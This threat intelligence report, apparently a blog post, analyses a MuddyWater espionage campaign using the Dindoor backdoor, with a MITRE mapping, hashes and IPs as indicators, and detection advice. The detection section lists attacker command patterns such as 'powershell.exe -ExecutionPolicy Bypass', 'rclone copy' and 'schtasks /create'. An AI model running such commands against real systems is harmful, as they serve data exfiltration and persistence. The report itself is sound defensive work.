Introduction
The Iranian threat group MuddyWater has been linked to a new cyber-espionage campaign targeting organizations across multiple strategic sectors.
The attackers deploy a previously undocumented backdoor called Dindoor, enabling persistent access, remote command execution, and stealthy data exfiltration.
This operation reflects the continued evolution of MuddyWater's tactics and its reliance on living-off-the-land techniques, legitimate tools, and cloud infrastructure to evade detection.
This report provides a threat intelligence analysis of the campaign including:
- threat actor profile
- malware analysis
- MITRE ATT&CK mapping
- infrastructure overview
- indicators of compromise (IOC)
- SOC detection opportunities.
Threat Actor Overview
The activity has been attributed to the Iranian state-linked group MuddyWater.
Known aliases
- Seedworm
- Static Kitten
- TA450
- Mango Sandstorm
The group is widely believed to operate under the Iranian Ministry of Intelligence and Security (MOIS).
Strategic objectives
MuddyWater campaigns typically focus on:
- geopolitical intelligence gathering
- strategic surveillance
- monitoring government and defense organizations.
Targeted Sectors
The campaign targets organizations operating in sensitive industries.
| Sector | Motivation |
| --------------------------- | -------------------------------------- |
| Financial institutions | Economic intelligence |
| Aviation and transportation | Critical infrastructure reconnaissance |
| NGOs | Political monitoring |
| Technology companies | Intellectual property theft |
| Defense sector | Strategic intelligence |Initial Access Vector
Threat actors likely gain initial access through spear-phishing campaigns or malicious document attachments.
After execution, attackers deploy a PowerShell loader which downloads and executes the Dindoor backdoor.
Malware Analysis — Dindoor Backdoor
Dindoor functions as a persistent backdoor designed to provide attackers with full remote control over compromised systems.
Key capabilities
- remote command execution
- file exfiltration
- payload download
- system reconnaissance
- persistence mechanisms.
Infection chain
Phishing Email
↓
PowerShell Script
↓
Dindoor Backdoor
↓
Command & Control Server
↓
Data ExfiltrationInfrastructure Architecture
The campaign relies on a layered infrastructure designed to conceal the attackers' command-and-control servers.
Victim Machine
│
PowerShell Loader
│
Dindoor Backdoor
│
Encrypted HTTPS
│
Relay Server (VPS)
│
Command & Control Infrastructure
│
Cloud Storage ExfiltrationAttackers commonly use cloud storage platforms to exfiltrate stolen data, making detection significantly more difficult.
MITRE ATT&CK Mapping
This campaign aligns with multiple techniques defined in the MITRE framework.
| Tactic | Technique | ID |
| ----------------- | ---------------------------- | --------- |
| Initial Access | Spear-phishing Attachment | T1566.001 |
| Execution | PowerShell | T1059.001 |
| Persistence | Registry Run Keys | T1547.001 |
| Persistence | Scheduled Tasks | T1053 |
| Defense Evasion | Obfuscated Files | T1027 |
| Credential Access | Credential Dumping | T1003 |
| Discovery | System Information Discovery | T1082 |
| Lateral Movement | Remote Services | T1021 |
| Command & Control | Web Protocols | T1071.001 |
| Exfiltration | Exfiltration Over C2 | T1041 |Indicators of Compromise (IOC)
Malware
Dindoor
Fakeset
Stagecomp
DarkcompTools observed
rclone.exe
deno.exe
powershell.exe
cmd.exeMalicious code-signing certificates
Amy Cherne
Donald GayMalware hashes (SHA256)
1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca
25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a
eac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f
3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230Suspicious IP infrastructure
138.199.156.22
101.53.236.209
110.40.39.129
146.70.124.102
94.131.109.65
95.164.38.99
45.67.230.91
95.164.46.199
94.131.98.14
94.131.3.160Cloud infrastructure used
*.wasabisys.comSOC Detection Opportunities
Security teams should monitor for suspicious activity related to:
Suspicious process execution
deno.exe run
powershell.exe -ExecutionPolicy Bypass
rclone copyPersistence mechanisms
schtasks /create
registry run keysNetwork anomalies
Indicators include:
- repeated HTTPS traffic to unknown VPS infrastructure
- connections to newly registered domains
- unusual cloud storage connections.
Detection Rules
Detection rules can be implemented using the SigmaHQ framework or malware detection engines like YARA.
Example Sigma rule
title: Suspicious Deno Runtime Execution
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\deno.exe'
condition: selection
level: mediumStrategic Assessment
The campaign demonstrates the continued evolution of MuddyWater.
Threat actors increasingly rely on:
- legitimate system tools
- cloud infrastructure
- modular malware frameworks.
These techniques significantly complicate traditional detection methods and require organizations to adopt behavior-based monitoring and proactive threat hunting.
Conclusion
This campaign highlights the persistent threat posed by state-sponsored cyber espionage groups.
Organizations should implement advanced monitoring, endpoint detection, and threat intelligence capabilities to detect and mitigate such attacks.
As threat actors continue to refine their tradecraft, collaboration between security teams and the threat intelligence community remains essential to defending modern networks.
About the Author
Cyber Threat Intelligence Researcher focusing on:
- advanced persistent threats (APT)
- malware analysis
- cyber espionage operations
- threat hunting and SOC detection.